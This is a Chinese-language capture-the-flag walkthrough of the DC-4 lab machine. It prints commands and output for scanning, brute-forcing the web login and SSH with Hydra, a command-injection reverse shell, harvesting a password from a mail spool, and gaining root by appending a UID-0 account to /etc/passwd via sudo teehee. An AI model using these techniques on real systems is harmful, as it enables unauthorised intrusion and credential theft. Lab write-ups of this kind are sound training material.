主要知识点
- 密码爆破
- 潜在的包含密码的文件搜索
- 在/etc/passwd 插入新用户提权
具体步骤
首先执行nmap 扫描,比较直接,80和22端口,22端口虽然有vulnerability,但是对咱们目前的情况来讲没有太大的帮助,主要关注一下80端口
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:37 UTC
Nmap scan report for 192.168.52.195
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
对80端口进行nikto扫描和路径爆破,得到如下内容
C:\home\kali\Documents\OFFSEC\play\DC-4> cat nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.52.195
+ Target Hostname: 192.168.52.195
+ Target Port: 80
+ Start Time: 2024-12-13 09:38:25 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-12-13 09:38:38 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.172.195
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/command.php (Status: 302) [Size: 704] [--> index.php]
/css (Status: 301) [Size: 170] [--> http://192.168.172.195/css/]
/images (Status: 301) [Size: 170] [--> http://192.168.172.195/images/]
/index.php (Status: 200) [Size: 506]
/login.php (Status: 302) [Size: 206] [--> index.php]
/logout.php (Status: 302) [Size: 163] [--> index.php]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
===============================================================
看来80端口开放了一个PHP写的应用,并且有command.php,index.php,login.php等主要文件,且login.php为登录页面
打开burpsuite ,尝试进行密码爆破,得到admin / happy 作为用户名和密码可以登录成功
登录成功后跳转到 command.php页面
查看请求,发现其实是发送了一个linux 命令作为参数,于是我们把该条请求记录发送到Repeater中进行修改,创建reverse shell
利用reverse shell我们可以查看到 old-passwords.bak,将其下载到本地后用来当做wordlist进行爆破
C:\home\kali\Documents\OFFSEC\play\DC-4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.172.195] 48660
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/usr/share/nginx/html
cd /home/jim
ls -l
total 16
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw-r--r-- 1 root root 33 Dec 13 21:42 local.txt
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwxrwxrwx 1 jim jim 190 Dec 13 22:07 test.sh
cd backups
ls
old-passwords.bak
得到密码jibril04
C:\home\kali\Documents\OFFSEC\play\DC-4> hydra -l jim -P password_list.txt ssh://192.168.172.195
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 20:09:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.172.195:22/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 41 to do in 00:01h, 13 active
[22][ssh] host: 192.168.172.195 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
用得到的密码可以以jim用户ssh登录到服务器,并且提示我有邮件
C:\home\kali\Documents\OFFSEC\play\DC-4> ssh jim@192.168.172.195
The authenticity of host '192.168.172.195 (192.168.172.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.172.195' (ED25519) to the list of known hosts.
jim@192.168.172.195's password:
......
......
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ sudo -l
查看了一下 mbox文件,没有太多收获,不过我们可以用来当做线索搜索其他邮件文件,于是我们上传linpeas.sh并运行,发现了线索
╔══════════╣ Mails (limit 50)
9813 4 -rw-rw---- 1 jim mail 2425 Dec 13 22:13 /var/mail/jim
7653 4 -rw-rw---- 1 www-data mail 3516 Dec 13 22:04 /var/mail/www-data
9813 4 -rw-rw---- 1 jim mail 2425 Dec 13 22:13 /var/spool/mail/jim
7653 4 -rw-rw---- 1 www-data mail 3516 Dec 13 22:04 /var/spool/mail/www-data
查看,得到了charles的密码
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
于是我们利用这个密码来变成charles身份,并且发现charles可以sudo执行/usr/bin/teehee,
charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
经过观察和试验,这个teehee运行后会接受terminal的输入来写入到文件中,于是我们可以利用这一点来在/etc/passwd中追加一条记录
charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
首先创建一个密码,在追加如下内容到/etc/passwd文件并转换成tim的身份达成提权目的
charles@dc-4:~$ openssl passwd 1234
HQpXGqbwWyrdo
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
charles@dc-4:~$ su tim
Password:
root@dc-4:/home/charles# cat /root/proof.txt
eb471b16059fc83e6f3cf3900b73be38
个人评价
总体来看,难度并不大但是步骤比较繁多,有些绕,尤其是登录密码爆破,考虑到网络以及社区版本的burpsuite的性能限制,只能尝试较小的wordlist,如果使用rockyou的话,到明天早晨也爆破不完,如果是考试的话,感觉尽量避免密码爆破,特别是使用大字典的情况。
![[64]最小路径和⭐](https://i-blog.csdnimg.cn/img_convert/baea89511844612964b588a314c8f6da.png)
